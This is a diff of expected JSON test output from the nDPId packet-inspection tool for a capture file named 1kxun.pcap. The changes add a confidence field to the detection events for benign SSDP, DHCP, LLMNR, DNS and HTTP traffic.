+00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376017,"flow_last_seen":1470104376017,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1470104376017,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"239.255.255.250","src_port":55312,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1470104376203,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"ts_msec":1470104376203,"pkt":"AQBef\/\/6GF4PUugBCABFAAChMIoAAAER0ubAqAU57\/\/\/+toBB2wAjcGgTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="}
 00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1470104376301,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"ts_msec":1470104376301,"pkt":"AQBef\/\/6SNIkYzEACABFAAChOpEAAAERyOzAqAUs7\/\/\/+si9B2wAjdLxTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376301,"flow_last_seen":1470104376301,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1470104376301,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00839{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1470104376301,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":1470104376301,"pkt":"\/\/\/\/\/\/\/\/cD6s8PAHCABFAAFIDscAAP8Rq94AAAAA\/\/\/\/\/wBEAEMBNJGnAQEGAAYPv1sAAAAAAAAAAAAAAAAAAAAAAAAAAHA+rPDwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEDNwcBeQMGD3f8OQIF3D0HAXA+rPDwBzIEwKgD7TMEAHanAAwEU2hlbv8AAAAAAAAAAAAAAAAAAAAA"}
-00682{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376301,"flow_last_seen":1470104376301,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1470104376301,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"shen","fingerprint":"1,121,3,6,15,119,252","class_ident":""}}
+00708{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376301,"flow_last_seen":1470104376301,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1470104376301,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"shen","fingerprint":"1,121,3,6,15,119,252","class_ident":""}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376816,"flow_last_seen":1470104376816,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1470104376816,"l3_proto":"ip6","src_ip":"fe80::406:55a8:6453:25dd","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1470104376816,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":98,"pkt_l4_len":44,"ts_msec":1470104376816,"pkt":"MzMAAQACcD6s8PAHht1gBWEEACwRAf6AAAAAAAAABAZVqGRTJd3\/AgAAAAAAAAAAAAAAAQACAiICIwAsiWgLJ3MdAAEADgABAAEduOb7cD6s8PAHAAYABAAXABgACAACAAA="}
-00611{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376816,"flow_last_seen":1470104376816,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1470104376816,"l3_proto":"ip6","src_ip":"fe80::406:55a8:6453:25dd","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"proto":"DHCPV6","breed":"Acceptable","category":"Network"}}
+00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376816,"flow_last_seen":1470104376816,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1470104376816,"l3_proto":"ip6","src_ip":"fe80::406:55a8:6453:25dd","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}}
 00841{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1470104377223,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":1470104377223,"pkt":"\/\/\/\/\/\/\/\/TF4M6gNlCABFAAFIAAAAABARcfzAqHcB\/\/\/\/\/wBDAEQBNGjoAgEGAOGY7R0AAIAAwKgDVsCoA1bAqHcBAAAAAMjTo5OjcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEFNgTAqHcBMwQAAAA8AQT\/\/wAAAwTAqHcBBhCoXwEBCAgICKhfwAEICAQEKgioX8MMe8wtdP8AAAAA"}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377634,"flow_last_seen":1470104377634,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104377634,"l3_proto":"ip6","src_ip":"fe80::edf5:240a:c8c0:8312","dst_ip":"ff02::1:3","src_port":61603,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1470104377634,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1470104377634,"pkt":"MzMAAQADzD2CHu7jht1gAAAAACARAf6AAAAAAAAA7fUkCsjAgxL\/AgAAAAAAAAAAAAAAAQAD8KMU6wAgDOCgAAAAAAEAAAAAAAAGUk9fWDFDAAD\/AAE="}
-00615{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377634,"flow_last_seen":1470104377634,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104377634,"l3_proto":"ip6","src_ip":"fe80::edf5:240a:c8c0:8312","dst_ip":"ff02::1:3","src_port":61603,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377634,"flow_last_seen":1470104377634,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104377634,"l3_proto":"ip6","src_ip":"fe80::edf5:240a:c8c0:8312","dst_ip":"ff02::1:3","src_port":61603,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377634,"flow_last_seen":1470104377634,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104377634,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"224.0.0.252","src_port":61603,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1470104377634,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104377634,"pkt":"AQBeAAD8zD2CHu7jCABFAAA0LRcAAAER5c7AqAUv4AAA\/PCjFOsAIMFmoAAAAAABAAAAAAAABlJPX1gxQwAA\/wAB"}
-00604{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377634,"flow_last_seen":1470104377634,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104377634,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"224.0.0.252","src_port":61603,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377634,"flow_last_seen":1470104377634,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104377634,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"224.0.0.252","src_port":61603,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377634,"flow_last_seen":1470104377634,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1470104377634,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"239.255.255.250","src_port":60267,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00616{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1470104377634,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"ts_msec":1470104377634,"pkt":"AQBef\/\/6zD2CHu7jCABFAAClQLQAAAQRv8LAqAUv7\/\/\/+utrB2wAkWQETS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="}
-00610{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377634,"flow_last_seen":1470104377634,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1470104377634,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"239.255.255.250","src_port":60267,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377634,"flow_last_seen":1470104377634,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1470104377634,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"239.255.255.250","src_port":60267,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377720,"flow_last_seen":1470104377720,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1470104377720,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"224.0.0.252","src_port":51458,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1470104377720,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"ts_msec":1470104377720,"pkt":"AQBeAAD8ABxCjnAxCABFAAAyUcEAAAERU03AqHMI4AAA\/MkCFOsAHtPcYF4AAAABAAAAAAAABHdwYWQAAAEAAQ=="}
-00605{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377720,"flow_last_seen":1470104377720,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1470104377720,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"224.0.0.252","src_port":51458,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377720,"flow_last_seen":1470104377720,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1470104377720,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"224.0.0.252","src_port":51458,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1470104377720,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"ts_msec":1470104377720,"pkt":"AQBeAAD8ABxCjnAxCABFAAAyUcEAAAERU03AqHMI4AAA\/MkCFOsAHtPcYF4AAAABAAAAAAAABHdwYWQAAAEAAQ=="}
 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377734,"flow_last_seen":1470104377734,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1470104377734,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":51024,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1470104377734,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"ts_msec":1470104377734,"pkt":"TF4M6gNlABxCjnAxCABFAABCUcIAAIARpSjAqHMICAgICMdQADUALoWI\/SwBAAABAAAAAAAAAmpwBmthbmthbgUxa3h1bgRtb2JpAAABAAE="}
-00742{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377734,"flow_last_seen":1470104377734,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1470104377734,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":51024,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": {"query":"jp.kankan.1kxun.mobi","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377734,"flow_last_seen":1470104377734,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1470104377734,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":51024,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": {"query":"jp.kankan.1kxun.mobi","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1470104377734,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"ts_msec":1470104377734,"pkt":"TF4M6gNlABxCjnAxCABFAABCUcIAAIARpSjAqHMICAgICMdQADUALoWI\/SwBAAABAAAAAAAAAmpwBmthbmthbgUxa3h1bgRtb2JpAAABAAE="}
 00523{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1470104377753,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"ts_msec":1470104377753,"pkt":"ABxCjnAxTF4M6gNlCABFAABinjgAAC4RqpIICAgIwKhzCAA1x1AATmX5\/SyBgAABAAIAAAAAAmpwBmthbmthbgUxa3h1bgRtb2JpAAABAAHADAABAAEAAAErAARquSNuwAwAAQABAAABKwAEarkjcA=="}
-00758{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104377734,"flow_last_seen":1470104377753,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1470104377753,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":51024,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": {"query":"jp.kankan.1kxun.mobi","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"106.185.35.110"}}
+00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104377734,"flow_last_seen":1470104377753,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1470104377753,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":51024,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": {"query":"jp.kankan.1kxun.mobi","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"106.185.35.110"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377754,"flow_last_seen":1470104377754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1470104377754,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49597,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1470104377754,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104377754,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UcRAAIAG5yfAqHMIarkjbsG9AFA9WFFgAAAAAIACIAA9OgAAAgQE7AEDAwgBAQQC"}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1470104377754,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104377754,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UcRAAIAG5yfAqHMIarkjbsG9AFA9WFFgAAAAAIACIAA9OgAAAgQE7AEDAwgBAQQC"}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1470104377810,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104377810,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGguxquSNuwKhzCABQwb1z6xq8PVhRYYASchBbqgAAAgQFtAEBBAIBAwMH"}
